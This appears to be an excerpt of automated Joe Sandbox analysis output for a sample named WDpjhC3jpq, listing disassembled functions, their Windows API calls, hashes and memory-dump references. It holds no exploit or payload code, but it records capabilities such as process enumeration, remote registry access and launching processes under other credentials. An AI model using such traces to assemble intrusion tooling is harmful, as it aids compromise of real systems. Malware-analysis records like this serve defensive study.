StringFromGUID2.OLE32(?,?,00000028), ref: 00260A38
SysAllocString.OLEAUT32(?), ref: 00260A46

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e8ea5eada9a2100916c592edf72b23f16228543305ad850018da4c75b852c358
Instruction ID: a1faed51828bf3806063031d21fcca301078f97e1d8ed46505d972552e183321
Opcode Fuzzy Hash: e8ea5eada9a2100916c592edf72b23f16228543305ad850018da4c75b852c358
Instruction Fuzzy Hash: B3216275614205AF9B10DFE8DCC8DABB7ECEF0D3607408125FA09CB261EA74EC819B64

Function 0028A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0023D1BA
Part of subcall function 0023D17C: GetStockObject.GDI32(00000011), ref: 0023D1CE
Part of subcall function 0023D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0023D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0028A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0028A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0028A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0028A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0028A360

Strings

Msctls_Progress32, xrefs: 0028A2FE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 58dc39935f8851798fff0f884bc2cd35c486bce767f80eb1acbd297c13277573
Instruction ID: 4b5abe009d7a8f4d8134560187dfab103bc32766413030394a09d9b6ac7764cb
Opcode Fuzzy Hash: 58dc39935f8851798fff0f884bc2cd35c486bce767f80eb1acbd297c13277573
Instruction Fuzzy Hash: 171190B5160219BFEF116F60DC85EEB7F6DFF09798F014115BA08A60A0CA729C21DBA4

Function 0023CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0023CCF6
GetWindowRect.USER32(?,?), ref: 0023CD37
ScreenToClient.USER32(?,?), ref: 0023CD5F
GetClientRect.USER32(?,?), ref: 0023CE8C
GetWindowRect.USER32(?,?), ref: 0023CEA5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 1e8c9da4d1c46533b18d4a65729e2980eba3258c7b4ad9661147e696e0f8c230
Instruction ID: fc3c43cf3dc94d7b70a638ad7a3773369673ebc7499c3ef747de811b7a2c9b35
Opcode Fuzzy Hash: 1e8c9da4d1c46533b18d4a65729e2980eba3258c7b4ad9661147e696e0f8c230
Instruction Fuzzy Hash: 7CB170B992024ADBDF14CFA8C4847EDB7B1FF08700F249529EC59EB254DB70A960DB54

Function 00281BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00281C18
Process32FirstW.KERNEL32(00000000,?), ref: 00281C26
__wsplitpath.LIBCMT ref: 00281C54

Part of subcall function 00241DFC: __wsplitpath_helper.LIBCMT ref: 00241E3C

_wcscat.LIBCMT ref: 00281C69
Process32NextW.KERNEL32(00000000,?), ref: 00281CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00281CF1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: d0ba13f10888bb61bc11319657f0c5bbb0914781b97259038c86a58dfcffd2f4
Instruction ID: d9f5fc8d4a55f43c8086cd4c113680c6a2dca1f711aaca0ad5afcee7ce8a129b
Opcode Fuzzy Hash: d0ba13f10888bb61bc11319657f0c5bbb0914781b97259038c86a58dfcffd2f4
Instruction Fuzzy Hash: 65518EB1114300AFD724EF64D885EABB7ECEF88714F00491EF58A97291EB709925CB92

Function 00282FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00283C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00282BB5,?,?), ref: 00283C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002830AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002830EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00283112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0028313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028317E
RegCloseKey.ADVAPI32(00000000), ref: 0028318B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: acdf487af411ef19c8a212ee475b8243a4335882b2218090db69ba18f0544ae3
Instruction ID: eb977eb076ddc5ed5e0d8c4e78c75eaa54aac00f4ec21979812d19738ce5757c
Opcode Fuzzy Hash: acdf487af411ef19c8a212ee475b8243a4335882b2218090db69ba18f0544ae3
Instruction Fuzzy Hash: 46515831124200AFC704EFA4D885E6EBBE9FF89704F04491DF595872A1DB71EA25CF52

Function 002884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00288540
GetMenuItemCount.USER32(00000000), ref: 00288577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0028859F
GetMenuItemID.USER32(?,?), ref: 0028860E
GetSubMenu.USER32(?,?), ref: 0028861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0028866D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: f128426aee51b503a2a5c929e0faf0fe546716632ddc55a622ea8212bcf9abbf
Instruction ID: 1e0f28f04ef28b5653f140544caaf4942738cd96ba07166c19cb3e1b1cfbc1ac
Opcode Fuzzy Hash: f128426aee51b503a2a5c929e0faf0fe546716632ddc55a622ea8212bcf9abbf
Instruction Fuzzy Hash: 4051BC75E11225EFCB11EFA4D845AAEB7F8EF08710F118459E906BB391DB70AE508F90

Function 00264AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00264B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00264B5B
IsMenu.USER32(00000000), ref: 00264B7B
CreatePopupMenu.USER32 ref: 00264BAF
GetMenuItemCount.USER32(000000FF), ref: 00264C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00264C3E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7c7c3ebc6a38251e5ad9f18083de9e2ab029e9e9474e100c2438db2f2aba8d30
Instruction ID: 2340ea75d8be88abda708861606112c62b61db8e79760147f5d7f8e7be05a8d4
Opcode Fuzzy Hash: 7c7c3ebc6a38251e5ad9f18083de9e2ab029e9e9474e100c2438db2f2aba8d30
Instruction Fuzzy Hash: 70512470A1130AEFCF24EF64D888BADBBF4AF05308F14411AE4959B390D7B0D9A0CB51

Function 00278DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,002BDC00), ref: 00278E7C
WSAGetLastError.WSOCK32(00000000), ref: 00278E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00278EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00278EC5
_strlen.LIBCMT ref: 00278EF7
WSAGetLastError.WSOCK32(00000000), ref: 00278F6A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 863239e5512d497b159600b25ce70fe5d694bffc1efe33ca8b7459a7acbca804
Instruction ID: 169b433019a48cba34d56b4ed2f6671aaedb22f73e88df7eee98d4fdc32e36ee
Opcode Fuzzy Hash: 863239e5512d497b159600b25ce70fe5d694bffc1efe33ca8b7459a7acbca804
Instruction Fuzzy Hash: AF41C171520114AFCB18EFA4DD89EAEB7B9AF48310F208259F51A97691DF30AE50CF61

Function 0023ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

BeginPaint.USER32(?,?,?), ref: 0023AC2A
GetWindowRect.USER32(?,?), ref: 0023AC8E
ScreenToClient.USER32(?,?), ref: 0023ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0023ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0023AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0029E673

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: d7cb7382b77daaa90f2f753cf2f6eeb29cb00e057a94ac4554c2666fd459832a
Instruction ID: c125c256896bc9e4bb1ddc4512df4c22e8c0913f6fe60a86df637fa95ead32b8
Opcode Fuzzy Hash: d7cb7382b77daaa90f2f753cf2f6eeb29cb00e057a94ac4554c2666fd459832a
Instruction Fuzzy Hash: E541D2B01143019FCB10DF24EC88FB67BACEB5A720F040679F9A58B2A1D7319865DB62

Function 0028E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(002E1628,00000000,002E1628,00000000,00000000,002E1628,?,0029DC5D,00000000,?,00000000,00000000,00000000,?,0029DAD1,00000004), ref: 0028E40B
EnableWindow.USER32(00000000,00000000), ref: 0028E42F
ShowWindow.USER32(002E1628,00000000), ref: 0028E48F
ShowWindow.USER32(00000000,00000004), ref: 0028E4A1
EnableWindow.USER32(00000000,00000001), ref: 0028E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0028E4E8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ab1ee1ee071050566c5587ddb43ae9bb0bc915482592e9786a4019865dbb9047
Instruction ID: f5908650a46872cd793a37c359e44ad7fffbf0ddd2f2b9fba024293a3843d1b0
Opcode Fuzzy Hash: ab1ee1ee071050566c5587ddb43ae9bb0bc915482592e9786a4019865dbb9047
Instruction Fuzzy Hash: CE418E38602142EFDF26DF24D489F947BE0BF09304F5981A9EA5D8F2E2C731A855CB61

Function 002698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002698D1

Part of subcall function 0023F4EA: std::exception::exception.LIBCMT ref: 0023F51E
Part of subcall function 0023F4EA: __CxxThrowException@8.LIBCMT ref: 0023F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00269908
EnterCriticalSection.KERNEL32(?), ref: 00269924
LeaveCriticalSection.KERNEL32(?), ref: 0026999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002699B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 002699D2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 521c7b9892eb318096a5ebcf74595f004c8606c952c442b959c4e2aad782f438
Instruction ID: a7bcb6a3e0e309bfa16e01e77999b32ce377c443bb946579d0ba366a4a6ac8c2
Opcode Fuzzy Hash: 521c7b9892eb318096a5ebcf74595f004c8606c952c442b959c4e2aad782f438
Instruction Fuzzy Hash: 67317071900205EBDB109F94ED89AABB778FF45710F1480A9E905AB246DB34DE64DBA0

Function 00279B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,002777F4,?,?,00000000,00000001), ref: 00279B53

Part of subcall function 00276544: GetWindowRect.USER32(?,?), ref: 00276557

GetDesktopWindow.USER32 ref: 00279B7D
GetWindowRect.USER32(00000000), ref: 00279B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00279BB6

Part of subcall function 00267A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00267AD0

GetCursorPos.USER32(?), ref: 00279BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00279C44

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 7e336d5fc32a9132a8d72764e64af7c8c979445a54a3bd0bff9bd71db0e017b0
Instruction ID: be200c2194a07179cd6d9e86ec26ff60a83a4cdc8e2fb6149ae8bad0bbbb2a85
Opcode Fuzzy Hash: 7e336d5fc32a9132a8d72764e64af7c8c979445a54a3bd0bff9bd71db0e017b0
Instruction Fuzzy Hash: B131EF72514306ABC710DF58EC49F9AB7E9FF89318F00091AF589E7191DA30EA58CB92

Function 0025AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0025AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0025AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0025AFC4
CloseHandle.KERNEL32(00000004), ref: 0025AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0025B012

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 38cae833027361f8b4e0d041c63983ffc808df260929b5ef9675dbdff39b2a8a
Instruction ID: bd61281f45cf15d4a0656466d4ad2904692ef43965645bf6ec1fb7a20fe2d754
Opcode Fuzzy Hash: 38cae833027361f8b4e0d041c63983ffc808df260929b5ef9675dbdff39b2a8a
Instruction Fuzzy Hash: 7D218EB211020EAFCF028F94ED0AFAE7BA9EF45305F044155FE02A2561C7769D24EB65

Function 0028EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0023AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0023AFE3
Part of subcall function 0023AF83: SelectObject.GDI32(?,00000000), ref: 0023AFF2
Part of subcall function 0023AF83: BeginPath.GDI32(?), ref: 0023B009
Part of subcall function 0023AF83: SelectObject.GDI32(?,00000000), ref: 0023B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0028EC20
LineTo.GDI32(00000000,00000003,?), ref: 0028EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0028EC42
LineTo.GDI32(00000000,00000000,?), ref: 0028EC52
EndPath.GDI32(00000000), ref: 0028EC62
StrokePath.GDI32(00000000), ref: 0028EC72

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 180a97498ca6f73757dd9092d0cfb6793d2c485b65b5269d1f0299181b7354ae
Instruction ID: cb80e8cf62850ca852a5189c223bae55b1e5ff209602c6395de69ded9b284fac
Opcode Fuzzy Hash: 180a97498ca6f73757dd9092d0cfb6793d2c485b65b5269d1f0299181b7354ae
Instruction Fuzzy Hash: 65111B7640014DBFEF029F90EC88EEA7F6DEB09350F048122BE0989160DB719E65DBA0

Function 0025E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0025E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0025E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0025E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0025E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0025E209

Part of subcall function 00259AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00259A05,00000000,00000000,?,00259DDB), ref: 0025A53A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 49186f46c8a9108a3dbaec241d466e4a72361bb9834df49b82c225ec3cfe810c
Instruction ID: ef026dfcdab5003d32be34972f06e491012d82be64e6762b95e8bbc64fe45bfd
Opcode Fuzzy Hash: 49186f46c8a9108a3dbaec241d466e4a72361bb9834df49b82c225ec3cfe810c
Instruction Fuzzy Hash: F901D4B5A00705BFEF009FA59C49B5EBFB8EB49751F008066EE09A7280DA308C00CFA0

Function 00247B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00247B47

Part of subcall function 0024123A: __initp_misc_winsig.LIBCMT ref: 0024125E
Part of subcall function 0024123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00247F51
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00247F65
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00247F78
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00247F8B
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00247F9E
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00247FB1
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00247FC4
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00247FD7
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00247FEA
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00247FFD
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00248010
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00248023
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00248036
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00248049
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0024805C
Part of subcall function 0024123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0024806F

__mtinitlocks.LIBCMT ref: 00247B4C

